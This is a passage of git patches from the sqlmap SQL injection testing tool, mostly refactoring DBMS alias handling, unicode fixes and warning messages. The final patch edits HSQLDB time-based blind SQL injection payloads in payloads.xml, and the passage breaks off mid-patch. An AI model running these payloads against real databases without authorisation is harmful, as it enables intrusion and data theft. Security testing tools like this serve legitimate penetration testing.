From 03c8e7b7a2581a7642d2d6eba3315d30577e35b0 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 30 Aug 2014 17:13:02 +0200
Subject: [PATCH 001/492] Patch for an Issue #810

---
 lib/core/common.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 245763b9b..70768bcea 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2841,10 +2841,10 @@ def maskSensitiveData(msg):
     Masks sensitive data in the supplied message
     """
 
-    retVal = msg
+    retVal = getUnicode(msg)
 
     for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy"))):
-        regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", item)
+        regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item))
         while extractRegexResult(regex, retVal):
             value = extractRegexResult(regex, retVal)
             retVal = retVal.replace(value, '*' * len(value))

From e501b2a80b253dbecc57b6be694224685b87cc7d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 30 Aug 2014 20:58:15 +0200
Subject: [PATCH 002/492] Minor patch

---
 lib/core/common.py | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/lib/core/common.py b/lib/core/common.py
index 70768bcea..573d28bac 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -576,6 +576,11 @@ def paramToDict(place, parameters=None):
                         test = readInput(message, default="N")
                         if test[0] not in ("y", "Y"):
                             raise SqlmapSilentQuitException
+                    elif not _:
+                        warnMsg = "provided value for parameter '%s' is empty. " % parameter
+                        warnMsg += "Please, always use only valid parameter values "
+                        warnMsg += "so sqlmap could be able to run properly"
+                        logger.warn(warnMsg)
 
     if conf.testParameter and not testableParameters:
         paramStr = ", ".join(test for test in conf.testParameter)

From 1a9a331422b6e505332111a2070bf48869dab43b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 30 Aug 2014 21:34:23 +0200
Subject: [PATCH 003/492] Bug fix (proper extending of tests when dbms is
 known)

---
 lib/controller/checks.py |  4 ++++
 lib/core/option.py       | 17 +++--------------
 lib/core/settings.py     |  2 ++
 3 files changed, 9 insertions(+), 14 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 5c241b8b2..b4df11117 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -106,6 +106,10 @@ def checkSqlInjection(place, parameter, value):
                         msg = "do you want to include all tests for '%s' " % _
                         msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk)
                         kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
+            elif kb.extendTests is None:
+                msg = "do you want to include all tests for '%s' " % conf.dbms
+                msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk)
+                kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else ([conf.dbms])
 
             title = test.title
             stype = test.stype
diff --git a/lib/core/option.py b/lib/core/option.py
index 9e9c94715..a9af310d4 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -93,38 +93,29 @@ from lib.core.exception import SqlmapUnsupportedDBMSException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.log import FORMATTER
 from lib.core.optiondict import optDict
-from lib.core.settings import ACCESS_ALIASES
 from lib.core.settings import BURP_REQUEST_REGEX
 from lib.core.settings import BURP_XML_HISTORY_REGEX
 from lib.core.settings import CODECS_LIST_PAGE
 from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
-from lib.core.settings import DB2_ALIASES
+from lib.core.settings import DBMS_ALIASES
 from lib.core.settings import DEFAULT_PAGE_ENCODING
 from lib.core.settings import DEFAULT_TOR_HTTP_PORTS
 from lib.core.settings import DEFAULT_TOR_SOCKS_PORT
 from lib.core.settings import DUMMY_URL
-from lib.core.settings import FIREBIRD_ALIASES
 from lib.core.settings import INJECT_HERE_MARK
 from lib.core.settings import IS_WIN
 from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
 from lib.core.settings import LOCALHOST
-from lib.core.settings import MAXDB_ALIASES
 from lib.core.settings import MAX_CONNECT_RETRIES
 from lib.core.settings import MAX_NUMBER_OF_THREADS
-from lib.core.settings import MSSQL_ALIASES
-from lib.core.settings import MYSQL_ALIASES
 from lib.core.settings import NULL
-from lib.core.settings import ORACLE_ALIASES
 from lib.core.settings import PARAMETER_SPLITTING_REGEX
-from lib.core.settings import PGSQL_ALIASES
 from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
 from lib.core.settings import SITE
-from lib.core.settings import SQLITE_ALIASES
 from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX
 from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import SUPPORTED_OS
-from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import TIME_DELAY_CANDIDATES
 from lib.core.settings import UNION_CHAR_REGEX
 from lib.core.settings import UNKNOWN_DBMS_VERSION
@@ -890,11 +881,9 @@ def _setDBMS():
         errMsg += "it and sqlmap will fingerprint it for you."
         raise SqlmapUnsupportedDBMSException(errMsg)
 
-    for aliases in (MSSQL_ALIASES, MYSQL_ALIASES, PGSQL_ALIASES, ORACLE_ALIASES, \
-                    SQLITE_ALIASES, ACCESS_ALIASES, FIREBIRD_ALIASES, \
-                    MAXDB_ALIASES, SYBASE_ALIASES, DB2_ALIASES):
+    for dbms, aliases in DBMS_ALIASES:
         if conf.dbms in aliases:
-            conf.dbms = aliases[0]
+            conf.dbms = dbms
 
             break
 
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 4f1e23616..4a3b8eb7a 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -201,6 +201,8 @@ DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) f
 SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
 SUPPORTED_OS = ("linux", "windows")
 
+DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES))
+
 USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
 REFERER_ALIASES = ("ref", "referer", "referrer")
 HOST_ALIASES = ("host",)

From 177fc0376d38a962ad74f64f9d02a739b5db9fc4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 30 Aug 2014 21:37:38 +0200
Subject: [PATCH 004/492] Minor fix for HSQLDB

---
 lib/core/settings.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 4a3b8eb7a..aaca12a20 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -201,7 +201,7 @@ DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) f
 SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
 SUPPORTED_OS = ("linux", "windows")
 
-DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES))
+DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))
 
 USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
 REFERER_ALIASES = ("ref", "referer", "referrer")

From dc2ee8bfa0706618e7b8837282adc51d785ca3df Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 30 Aug 2014 21:53:09 +0200
Subject: [PATCH 005/492] Minor update

---
 lib/controller/handler.py               | 8 ++++----
 plugins/dbms/access/fingerprint.py      | 2 +-
 plugins/dbms/db2/fingerprint.py         | 2 +-
 plugins/dbms/firebird/fingerprint.py    | 2 +-
 plugins/dbms/hsqldb/fingerprint.py      | 2 +-
 plugins/dbms/maxdb/fingerprint.py       | 2 +-
 plugins/dbms/mssqlserver/fingerprint.py | 2 +-
 plugins/dbms/mysql/fingerprint.py       | 2 +-
 plugins/dbms/oracle/fingerprint.py      | 2 +-
 plugins/dbms/postgresql/fingerprint.py  | 2 +-
 plugins/dbms/sqlite/fingerprint.py      | 2 +-
 plugins/dbms/sybase/fingerprint.py      | 2 +-
 12 files changed, 15 insertions(+), 15 deletions(-)

diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index 38fece4ca..702215e7c 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -71,9 +71,9 @@ def setHandler():
         items.remove(_)
         items.insert(0, _)
 
-    for name, aliases, Handler, Connector in items:
-        if conf.dbms and conf.dbms not in aliases:
-            debugMsg = "skipping test for %s" % name
+    for dbms, aliases, Handler, Connector in items:
+        if conf.dbms and conf.dbms.lower() != dbms.lower():
+            debugMsg = "skipping test for %s" % dbms
             logger.debug(debugMsg)
             continue
 
@@ -84,7 +84,7 @@ def setHandler():
             logger.debug("forcing timeout to 10 seconds")
             conf.timeout = 10
 
-            dialect = DBMS_DICT[name][3]
+            dialect = DBMS_DICT[dbms][3]
 
             if dialect:
                 sqlalchemy = SQLAlchemy(dialect=dialect)
diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py
index 4b1244d0b..eecaf728b 100644
--- a/plugins/dbms/access/fingerprint.py
+++ b/plugins/dbms/access/fingerprint.py
@@ -146,7 +146,7 @@ class Fingerprint(GenericFingerprint):
         return value
 
     def checkDbms(self):
-        if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or conf.dbms in ACCESS_ALIASES):
+        if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or (conf.dbms or "").lower() in ACCESS_ALIASES):
             setDbms(DBMS.ACCESS)
 
             return True
diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py
index 59eba684c..ea467c076 100644
--- a/plugins/dbms/db2/fingerprint.py
+++ b/plugins/dbms/db2/fingerprint.py
@@ -81,7 +81,7 @@ class Fingerprint(GenericFingerprint):
         return value
 
     def checkDbms(self):
-        if not conf.extensiveFp and (Backend.isDbmsWithin(DB2_ALIASES) or conf.dbms in DB2_ALIASES):
+        if not conf.extensiveFp and (Backend.isDbmsWithin(DB2_ALIASES) or (conf.dbms or "").lower() in DB2_ALIASES):
             setDbms(DBMS.DB2)
 
             return True
diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py
index 9c22a4708..4973e56e4 100644
--- a/plugins/dbms/firebird/fingerprint.py
+++ b/plugins/dbms/firebird/fingerprint.py
@@ -104,7 +104,7 @@ class Fingerprint(GenericFingerprint):
 
     def checkDbms(self):
         if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \
-           or conf.dbms in FIREBIRD_ALIASES) and Backend.getVersion() and \
+           or (conf.dbms or "").lower() in FIREBIRD_ALIASES) and Backend.getVersion() and \
            Backend.getVersion() != UNKNOWN_DBMS_VERSION:
             v = Backend.getVersion().replace(">", "")
             v = v.replace("=", "")
diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py
index 1b58fc356..3d082c52a 100644
--- a/plugins/dbms/hsqldb/fingerprint.py
+++ b/plugins/dbms/hsqldb/fingerprint.py
@@ -81,7 +81,7 @@ class Fingerprint(GenericFingerprint):
         """
 
         if not conf.extensiveFp and (Backend.isDbmsWithin(HSQLDB_ALIASES) \
-           or conf.dbms in HSQLDB_ALIASES) and Backend.getVersion() and \
+           or (conf.dbms or "").lower() in HSQLDB_ALIASES) and Backend.getVersion() and \
            Backend.getVersion() != UNKNOWN_DBMS_VERSION:
             v = Backend.getVersion().replace(">", "")
             v = v.replace("=", "")
diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py
index 60a391448..be64c61b5 100644
--- a/plugins/dbms/maxdb/fingerprint.py
+++ b/plugins/dbms/maxdb/fingerprint.py
@@ -91,7 +91,7 @@ class Fingerprint(GenericFingerprint):
         return value
 
     def checkDbms(self):
-        if not conf.extensiveFp and (Backend.isDbmsWithin(MAXDB_ALIASES) or conf.dbms in MAXDB_ALIASES):
+        if not conf.extensiveFp and (Backend.isDbmsWithin(MAXDB_ALIASES) or (conf.dbms or "").lower() in MAXDB_ALIASES):
             setDbms(DBMS.MAXDB)
 
             self.getBanner()
diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py
index 90fffb160..33a7f5de8 100644
--- a/plugins/dbms/mssqlserver/fingerprint.py
+++ b/plugins/dbms/mssqlserver/fingerprint.py
@@ -66,7 +66,7 @@ class Fingerprint(GenericFingerprint):
 
     def checkDbms(self):
         if not conf.extensiveFp and (Backend.isDbmsWithin(MSSQL_ALIASES) \
-           or conf.dbms in MSSQL_ALIASES) and Backend.getVersion() and \
+           or (conf.dbms or "").lower() in MSSQL_ALIASES) and Backend.getVersion() and \
            Backend.getVersion().isdigit():
             setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
 
diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py
index 6343ada1f..9c87d62c0 100644
--- a/plugins/dbms/mysql/fingerprint.py
+++ b/plugins/dbms/mysql/fingerprint.py
@@ -143,7 +143,7 @@ class Fingerprint(GenericFingerprint):
         """
 
         if not conf.extensiveFp and (Backend.isDbmsWithin(MYSQL_ALIASES) \
-           or conf.dbms in MYSQL_ALIASES) and Backend.getVersion() and \
+           or (conf.dbms or "").lower() in MYSQL_ALIASES) and Backend.getVersion() and \
            Backend.getVersion() != UNKNOWN_DBMS_VERSION:
             v = Backend.getVersion().replace(">", "")
             v = v.replace("=", "")
diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py
index fd7e4c452..404bbbb6d 100644
--- a/plugins/dbms/oracle/fingerprint.py
+++ b/plugins/dbms/oracle/fingerprint.py
@@ -58,7 +58,7 @@ class Fingerprint(GenericFingerprint):
         return value
 
     def checkDbms(self):
-        if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or conf.dbms in ORACLE_ALIASES):
+        if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or (conf.dbms or "").lower() in ORACLE_ALIASES):
             setDbms(DBMS.ORACLE)
 
             self.getBanner()
diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py
index 0ae590382..a9f754df1 100644
--- a/plugins/dbms/postgresql/fingerprint.py
+++ b/plugins/dbms/postgresql/fingerprint.py
@@ -63,7 +63,7 @@ class Fingerprint(GenericFingerprint):
         * http://www.postgresql.org/docs/9.1/interactive/release.html (up to 9.1.3)
         """
 
-        if not conf.extensiveFp and (Backend.isDbmsWithin(PGSQL_ALIASES) or conf.dbms in PGSQL_ALIASES):
+        if not conf.extensiveFp and (Backend.isDbmsWithin(PGSQL_ALIASES) or (conf.dbms or "").lower() in PGSQL_ALIASES):
             setDbms(DBMS.PGSQL)
 
             self.getBanner()
diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py
index dd1b7e56b..41b2db01a 100644
--- a/plugins/dbms/sqlite/fingerprint.py
+++ b/plugins/dbms/sqlite/fingerprint.py
@@ -64,7 +64,7 @@ class Fingerprint(GenericFingerprint):
         * http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions
         """
 
-        if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or conf.dbms in SQLITE_ALIASES):
+        if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or (conf.dbms or "").lower() in SQLITE_ALIASES):
             setDbms(DBMS.SQLITE)
 
             self.getBanner()
diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py
index 19334526a..b072a3ace 100644
--- a/plugins/dbms/sybase/fingerprint.py
+++ b/plugins/dbms/sybase/fingerprint.py
@@ -59,7 +59,7 @@ class Fingerprint(GenericFingerprint):
 
     def checkDbms(self):
         if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) \
-           or conf.dbms in SYBASE_ALIASES) and Backend.getVersion() and \
+           or (conf.dbms or "").lower() in SYBASE_ALIASES) and Backend.getVersion() and \
            Backend.getVersion().isdigit():
             setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion()))
 

From 20ff402103ec0af1a29471c3729c4e1d7453cde0 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 30 Aug 2014 22:04:55 +0200
Subject: [PATCH 006/492] Minor patch

---
 lib/controller/checks.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index b4df11117..d6a403afc 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -106,7 +106,7 @@ def checkSqlInjection(place, parameter, value):
                         msg = "do you want to include all tests for '%s' " % _
                         msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk)
                         kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
-            elif kb.extendTests is None:
+            elif kb.extendTests is None and conf.level < 5 and conf.risk < 3:
                 msg = "do you want to include all tests for '%s' " % conf.dbms
                 msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk)
                 kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else ([conf.dbms])

From d5d01e91ad9d3a9b2976bdbac04aeeb557bc1f3c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 30 Aug 2014 22:15:14 +0200
Subject: [PATCH 007/492] Warning message

---
 lib/core/target.py | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/lib/core/target.py b/lib/core/target.py
index 6ed69acba..82570db34 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -115,6 +115,12 @@ def _setRequestParams():
             else:
                 kb.processUserMarks = not test or test[0] not in ("n", "N")
 
+                if kb.processUserMarks and "=%s" % CUSTOM_INJECTION_MARK_CHAR in conf.data:
+                    warnMsg = "it seems that you've provided empty parameter value(s) "
+                    warnMsg += "for testing. Please, always use only valid parameter values "
+                    warnMsg += "so sqlmap could be able to run properly"
+                    logger.warn(warnMsg)
+
         if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
             if re.search(JSON_RECOGNITION_REGEX, conf.data):
                 message = "JSON data found in %s data. " % conf.method
@@ -210,6 +216,12 @@ def _setRequestParams():
                 else:
                     kb.processUserMarks = not test or test[0] not in ("n", "N")
 
+                    if kb.processUserMarks and "=%s" % CUSTOM_INJECTION_MARK_CHAR in _:
+                        warnMsg = "it seems that you've provided empty parameter value(s) "
+                        warnMsg += "for testing. Please, always use only valid parameter values "
+                        warnMsg += "so sqlmap could be able to run properly"
+                        logger.warn(warnMsg)
+
             if not kb.processUserMarks:
                 if place == PLACE.URI:
                     query = urlparse.urlsplit(value).query

From 25c6fca20ea3838cc7f3039d4d9f976ac73e1709 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 1 Sep 2014 15:48:00 +0200
Subject: [PATCH 008/492] Minor fix

---
 lib/core/option.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index a9af310d4..6c8c30675 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1501,8 +1501,8 @@ def _cleanupOptions():
         conf.dbms = conf.dbms.capitalize()
 
     if conf.testFilter:
-        if not any([char in conf.testFilter for char in ('.', ')', '(', ']', '[')]):
-            conf.testFilter = conf.testFilter.replace('*', '.*')
+        conf.testFilter = conf.testFilter.strip('*+')
+        conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter)
 
     if "timeSec" not in kb.explicitSettings:
         if conf.tor:

From 7e40890f321ed8a14846fff1da19a3686614d336 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 1 Sep 2014 16:16:12 +0200
Subject: [PATCH 009/492] Patch for an Issue #815

---
 lib/core/target.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index 82570db34..8f0be26ac 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -556,7 +556,7 @@ def _createTargetDirs():
             f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
             f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
             if conf.data:
-                f.write("\n\n%s" % conf.data)
+                f.write("\n\n%s" % getUnicode(conf.data))
     except IOError, ex:
         if "denied" in str(ex):
             errMsg = "you don't have enough permissions "

From 1478c206f1f5ddddf64460e3be52e89e80faf06d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 3 Sep 2014 21:27:02 +0200
Subject: [PATCH 010/492] Trivial update

---
 xml/payloads.xml | 28 ++++++++++++++--------------
 1 file changed, 14 insertions(+), 14 deletions(-)

diff --git a/xml/payloads.xml b/xml/payloads.xml
index c39d71ede..d3bdc7419 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -2335,9 +2335,9 @@ Formats:
         <risk>0</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) END</vector>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) END</vector>
         <request>
-            <payload>;CALL REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
+            <payload>;CALL REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000)</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -2864,9 +2864,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
         <request>
-            <payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
+            <payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000)</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -2884,9 +2884,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
         <request>
-            <payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
+            <payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000)</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -3165,9 +3165,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
         <request>
-            <payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
+            <payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000)</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -3185,9 +3185,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
         <request>
-            <payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
+            <payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000)</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -3544,9 +3544,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -3765,9 +3765,9 @@ Formats:
         <risk>2</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
         <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
